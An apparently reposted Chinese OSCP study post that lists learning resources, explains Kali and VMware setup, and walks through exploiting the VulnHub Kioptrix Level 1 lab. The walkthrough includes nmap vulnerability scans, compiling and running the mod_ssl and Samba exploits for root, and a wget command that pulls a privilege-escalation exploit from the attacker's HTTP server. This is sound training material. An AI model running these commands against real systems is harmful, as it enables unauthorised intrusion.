学前补充-在线学习资源
国内中文资料
国内虽然网络安全学习资源逐渐丰富,但在涉及 OSCP 等国际认证时,中文资料相对较少,更多的仍需依赖官方英文资料。然而,我们可以通过一些中文平台获取相关的学习内容,并帮助更好地理解渗透测试和网络安全的基本概念。
-
泷羽Sec公众号:关注 泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。 -
**CSDN 泷羽Sec-静安栏目**:同样可以通过 CSDN 泷羽Sec-静安 账号找到关于 OSCP 考试、渗透测试工具等内容的详细教程,适合进行技术深度学习。 扫描下方二维码,马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
拓展国外资料
虽然国内资料主要依赖翻译或二次加工,但国外的资料更为丰富,尤其是针对渗透测试和 OSCP 考试的内容。建议你结合以下资源,深入学习并拓宽视野。无需完全掌握所有内容,但这些资料可以帮助你更好地理解考试大纲之外的技术点。
-
YouTube 渗透测试教程: -
渗透测试基础教程:这个视频系列为你提供了实战渗透测试的基础知识,非常适合入门学习。 -
进阶渗透测试系列:该系列侧重于进阶渗透测试技术,涵盖了多种实用的攻击手段和技巧,适合有一定基础的学员进一步提升技能。
-
-
Offensive Security 官方资源: -
OffSec Discord 群组:加入 OffSec 的 Discord 群,这是一个全球渗透测试爱好者和专业人员的聚集地,群内每周五会有免费直播,大家可以实时互动并提问。通过参与群组,你不仅能获得最新的培训信息,还有机会向其他 OSCP 备考者和认证过的专家请教问题。 -
OffSec 官方 YouTube 频道:OffSec 官方 YouTube 频道,官方会不定期更新关于渗透测试技巧、OSCP 备考心得等内容。特别适合在考试前复习并加深理解。 -
OffSec 官方 Twitch 频道:OffSec 官方 Twitch 频道:在这里你可以找到各种实时和过往的直播视频,包括渗透测试实战演示和技术讲解。定期观看这些直播,能够帮助你更好地理解渗透测试的实际操作,并获取最新的行业动态和实践技巧。
-
翻译软件使用
对于非英语母语的学习者,翻译软件可以极大地帮助理解英文资料,特别是一些技术性的讲解。以下是推荐的两款翻译工具,帮助提升学习效率:
-
**沉浸式翻译**: -
适用于翻译在线网页文档,特别是技术博客、教程页面等。这个工具支持将 YouTube 上的视频字幕实时翻译,便于理解外语讲解的内容,尤其是对于英语不太熟练的学习者来说,是一个非常有用的工具。
-
-
**讯飞同传**: -
这个工具非常适合观看一些沉浸式翻译不支持的视频,以及在后期与考试官的实时互动中使用。它可以帮助你实时将英语对话翻译成中文,并支持与考官之间的流畅交流。这对于 OSCP 考试时的实时沟通(例如,考试过程中需要与考官确认某些细节时)尤为重要。
-
通过这些工具,你可以在学习过程中克服语言障碍,更轻松地掌握 OSCP 考试的内容,尤其是在遇到复杂的技术概念或英文资料时,翻译软件将成为你学习的得力助手。
学习 OSCP 不仅需要掌握官方教材大纲的内容,更需要拓展视野,借助国内外的学习资源和翻译工具,提高自己的渗透测试能力。建议大家从 泷羽Sec-静安 公众号获取最新的学习资讯,结合国内外的视频教程和在线社区的互动,逐步完成 OSCP 认证的备考旅程。
Kali下载、VMware安装和镜像启动
Kali Linux由Offensive Security开发、资助和维护,是一个基于Debian的Linux发行版,专为高级渗透测试和安全审计设计。它集成了数百种信息安全工具,支持渗透测试、安全研究、计算机取证、逆向工程等多种任务。
Kali 下载
kali 官网下载地址:https://www.kali.org/get-kali/#kali-platforms
Get-FileHash .kali-linux-2024.4-vmware-amd64.7z -Algorithm SHA256
验证下载文件
VMware下载
VMware是一家领先的虚拟化和云计算技术公司,专注于提供企业级解决方案。其核心产品包括虚拟化平台、云管理和自动化工具,旨在帮助企业优化IT基础设施,提升运维效率。VMware的技术广泛应用于数据中心、桌面虚拟化、网络安全和应用开发等领域,推动了云计算、容器化和企业数字化转型的进程。
VMware 官网下载:https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion
下载安装后,激活网上找教程激活即可。2024年5月后Workstation 和 Fusion 对个人使用完全免费,企业许可转向订阅,个人用户也可以使用免费版。关注公众号泷羽Sec-静安
,后台回复找工具+Day2
获取镜像和相关软件。
镜像启动
在Vmware中点击打开虚拟机,选择下载好的kali镜像(解压一下),选择文件夹下的.vmx
文件即可。点击启动即可。
默认用户名:kali默认密码:kali
可以通过passwd
命令修改账户密码,但是学习阶段不建议,就一个虚拟机,省得后面复杂操作的时候记不得。
常用网站链接
kali全套官方工具包详解 https://www.kali.org/tools/all-tools/ kali 官方文档手册 https://www.kali.org/docs/ kali官方论坛 https://forums.kali.org/官方建议,发帖之前先阅读论坛规则和向导,不合规的帖子可能被忽略 kali bug自助页面 https://bugs.kali.org 官方kali解密书籍:《Kali Linux Revealed: mastering the penetration testing distribution》关注公众号 泷羽Sec-静安
后台回复找书+KLR
获取下载链接
kali换源和新装机设置
sudo -svim /etc/apt/sources.list
# 清华大学Kali镜像源deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free non-free-firmwaredeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free non-free-firmware
复制上面的内容,按I
键进入插入模式,插入到list文件中,注释原来的kali官方源,按ESC
退出编辑模式,然后按:wq
保存并退出。更多详细vim命令请参考菜鸟 Linux vi/vim,vimtutor和vim官方,或在终端输入vimtutor
查看官方指南。
然后在终端中更新镜像源并升级软件包。注意看源是否已经换成清华源。若你的网络对于清华源还是慢,可以参考Kali 2024更换源(超详细,附国内优质镜像源地址)_kali换源选择其他源。更新升级会占用大量时间,但这是必须的。
apt updateapt upgrade
安装或更新完成后,会遗留一些软件的安装包,会占用部分硬盘空间,可使用下面的命令来对其进行清理
apt-get clean
设置锁屏时间为从不
不然经常切换应用后要输入kali:kali
登录。左键点击电池图标,选择设置,找到安全性,设置锁屏时间为从不(never)
配置ssh服务
输入命令:vim /etc/ssh/sshd_config
将下面的命令改为yes
PasswordAuthentication yes 密码验证改为yes
输入命令:service ssh start
开启ssh服务 输入命令:update-rc.d ssh enable
设置为开机自启动 不要忘记 reboot
(重启kali虚拟机)
这样你就可以在虚拟机以外利用shell软件进行远程的访问。方便复制粘贴一些命令,有时候在kali中复制粘贴会有问题,然后就是截屏不方便。
我个人是喜欢使用MobaXterm来作为我的shell而不是默认终端。关注公众号泷羽Sec-静安
,后台回复找工具+Day2
获取镜像和相关软件。先在原本的kali中输入ifconfig
查看kali的网段,然后从mobaXterm中连接ssh登录kali即可。
汉化
我的建议是没有必要汉化,因为目前很多OSCP的资料还是英文的比较权威,汉化后不一定能一步一步找着英文教材对应的软件名字,还有一些细节的按钮。但是如果你实在觉得看着英文难受,觉得中文界面学习更方便的话,可以使用dpkg-reconfigure locales
命令选择按照汉化,然后重启,重启后会有提示框询问是否修改文件夹语言,记得一定要选择否,保留旧的英文名称,因为有一些安全工具,不支持中文路径,与其后期麻烦的改来改去纠结路径问题,不如全部保留英文路径。也建议在之后的学习中,保持起英文文件夹名字的习惯,用英文也好用拼音也好,总之要是英文字母的文件名。
至此,一个基本的好用的Kali已经设置完毕,可以开始靶机练习了。
Kioptix Level 1 练习
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Nmap扫描
输入ifconfig
查看kali本机的网段。
输入 nmap -sn kali的ip/24
探查网段,实战过程是通过vpn链接,进去后能查看网段。或 nmap -p- kali的ip/24
探查所有网段。
可以发现129有一个80端口,在kali浏览器中访问可以看到如下界面:
接下来探查端口指纹
nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-al
然后用漏洞扫描
nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln
得到输出
┌──(kali㉿kali)-[~]└─$ nmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vulnStarting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 22:14 ESTStats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-ScanNSE Timing: About 0.00% doneNmap scan report for 192.168.139.129Host is up (0.00025s latency).PORT STATE SERVICE22/tcp open ssh80/tcp open http|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.|_http-csrf: Couldn't find any CSRF vulnerabilities.|_http-dombased-xss: Couldn't find any DOM based XSS.|_http-trace: TRACE is enabled| http-enum:| /test.php: Test page| /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'| /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'|_ /usage/: Potentially interesting folder111/tcp open rpcbind139/tcp open netbios-ssn443/tcp open https|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)| ssl-poodle:| VULNERABLE:| SSL POODLE information leak| State: VULNERABLE| IDs: CVE:CVE-2014-3566 BID:70574| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other| products, uses nondeterministic CBC padding, which makes it easier| for man-in-the-middle attackers to obtain cleartext data via a| padding-oracle attack, aka the "POODLE" issue.| Disclosure date: 2014-10-14| Check results:| TLS_RSA_WITH_3DES_EDE_CBC_SHA| References:| https://www.imperialviolet.org/2014/10/14/poodle.html| https://www.openssl.org/~bodo/ssl-poodle.pdf| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566|_ https://www.securityfocus.com/bid/70574|_http-csrf: Couldn't find any CSRF vulnerabilities.| ssl-dh-params:| VULNERABLE:| Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)| State: VULNERABLE| IDs: CVE:CVE-2015-4000 BID:74733| The Transport Layer Security (TLS) protocol contains a flaw that is| triggered when handling Diffie-Hellman key exchanges defined with| the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker| to downgrade the security of a TLS session to 512-bit export-grade| cryptography, which is significantly weaker, allowing the attacker| to more easily break the encryption and monitor or tamper with| the encrypted stream.| Disclosure date: 2015-5-19| Check results:| EXPORT-GRADE DH GROUP 1| Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA| Modulus Type: Safe prime| Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus| Modulus Length: 512| Generator Length: 8| Public Key Length: 512| References:| https://www.securityfocus.com/bid/74733| https://weakdh.org| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000|| Diffie-Hellman Key Exchange Insufficient Group Strength| State: VULNERABLE| Transport Layer Security (TLS) services that use Diffie-Hellman groups| of insufficient strength, especially those using one of a few commonly| shared groups, may be susceptible to passive eavesdropping attacks.| Check results:| WEAK DH GROUP 1| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA| Modulus Type: Safe prime| Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus| Modulus Length: 1024| Generator Length: 8| Public Key Length: 1024| References:|_ https://weakdh.org|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.| ssl-ccs-injection:| VULNERABLE:| SSL/TLS MITM vulnerability (CCS Injection)| State: VULNERABLE| Risk factor: High| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h| does not properly restrict processing of ChangeCipherSpec messages,| which allows man-in-the-middle attackers to trigger use of a zero| length master key in certain OpenSSL-to-OpenSSL communications, and| consequently hijack sessions or obtain sensitive information, via| a crafted TLS handshake, aka the "CCS Injection" vulnerability.|| References:| http://www.cvedetails.com/cve/2014-0224| http://www.openssl.org/news/secadv_20140605.txt|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224|_http-dombased-xss: Couldn't find any DOM based XSS.|_sslv2-drown: ERROR: Script execution failed (use -d to debug)1024/tcp open kdmMAC Address: 00:0C:29:3B:F8:BB (VMware)Host script results:|_smb-vuln-ms10-054: false| smb-vuln-cve2009-3103:| VULNERABLE:| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)| State: VULNERABLE| IDs: CVE:CVE-2009-3103| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,| aka "SMBv2 Negotiation Vulnerability."|| Disclosure date: 2009-09-08| References:| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]Nmap done: 1 IP address (1 host up) scanned in 333.53 seconds
目录扫描
从Nmap扫描的结果来看,它提示以下几个文件目录,可能有洞。
使用如下命令扫描目录
dirb http://192.168.139.129/
看一圈泄露的目录后发现mod_ssl目录下似乎提示此漏洞可利用(靶机会这样提示,实战要自己猜自己挖)。且从之前的Nmap扫描结果中看出,SSL存在漏洞。
SSL漏洞利用 80/443端口
Kali终端中输入以下命令,查找可用的攻击方式。
searchsploit mod_ssl
根据之前Nmap扫描的版本信息选择对应的攻击方式。可用的几个方式都试一遍。下载攻击方式,如果下载文件有损坏,可以到 https://www.exploit-db.com/ 网站下载对应源码。
searchsploit -m 47080.csudo apt-get install libssl-dev # 安装依赖环境gcc -o ssl47080 47080.c -lcrypto # 编译源码
./ssl47080 |grep "1.3.20"
筛选符合 Apache 1.3.20
版本的工具
靶机系统是RedHat,所以使用0x6a
或0x6b
。
0x6a
测试失败,改用0x6b
,输入以下命令:
./ssl47080 0x6b 192.168.139.129 -c 40
提权为root
目前是使用apache账户登录shell,这个账户是用于apache服务的专用账户, 可以使用ls /bin
查看目前账户可以使用的命令,可以发现只能使用一些基本命令,权限较低,我们想要完整的shell就要root账户,就要提权。
现在本地攻击机下面下载提权脚本。
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
然后开启一个简单的http服务,提供给靶机用于下载提权脚本。
sudo python -m http.server 80
这个靶机好在可以使用wget
命令下载提权脚本。如果wget
用不了的情况,可以尝试用curl
或ftp
下载脚本。然后从之前47080进去的Apache账户的shell里运行以下命令:
wget http://192.168.139.128/ptrace-kmod.c
退出,然后再次重连,自动编译,就会获得root权限。如果重连后不是root,可以多试几次,或者更换47080.c文件。
另一种提权的方式:
(CVE-2003-0651)Apache RCE
https://www.cnblogs.com/wsec/p/vulnhub0x01.html#3cve-2003-0651apache-rce
这个67.c
文件最好从网站下载,kali里下载的不全。尾号305的才是正确的文件。
-
[ ] 但是编译不出来。
Samba 漏洞利用139端口
https://medium.com/@MarkdeMoras/kioptrix-level-1-1-vulnhub-walkthrough-by-mark-de-moras-147002cc4853
除了ssl漏洞,可以从之前的Nmap扫描结果发现也存在Samba漏洞。
使用Nmap再次扫描靶机的网址。
nmap -A -p- -T4 192.168.139.129
使用msf工具箱
msfconsolesearch scanner/smbuse 16infoset RHOST 192.168.139.129
这样就获取了samba的版本,退出msf,然后搜索samba的攻击方式,选择对应版本。下载,编译。
searchsploit samba 2.2.1asearchsploit -m multiple/remote/10.cgcc -o Samba 10.c
查看使用方式
使用如下命令爆破进入,直接获得root权限。
./Samba -b 0 192.168.139.129
Samba缓存漏洞利用139端口
搜索通用版本的samba攻击方式,发现,还有例如“call_trans2open”远程缓冲区溢出(2)漏洞利用的方式。下载编译后查看使用方式。
rpcbind 尝试
漏洞扫描的结果中还有111
端口和1024
端口的rpcbind服务,搜索了有如下方法,但是尝试失败。
https://www.cnblogs.com/KUANTECH/p/17941528
上面这篇文章也做过了尝试是失败的,所以rpc的漏洞就不尝试了。
总结
找漏洞渗透的步骤:
-
Nmap 扫可能的漏洞和端口 nmap -sn kali的ip/24nmap 192.168.139.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-alnmap 192.168.139.129 -p 22,80,111,139,443,1024 --script=vuln
-
dirb扫目录 -
观察可能的端口和应用 -
searchsploit 和msf搜索可用的攻击载荷 searchsploit xxxsearchsploit -m 67.c---msfconsolesearch xxxuse 编号infoset Rhost 192.168.139.129run
-
根据版本选择poc,编译,调试,打!
原文始发于微信公众号(泷羽Sec-静安):Day2 在线学习资源和Kali安装使用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论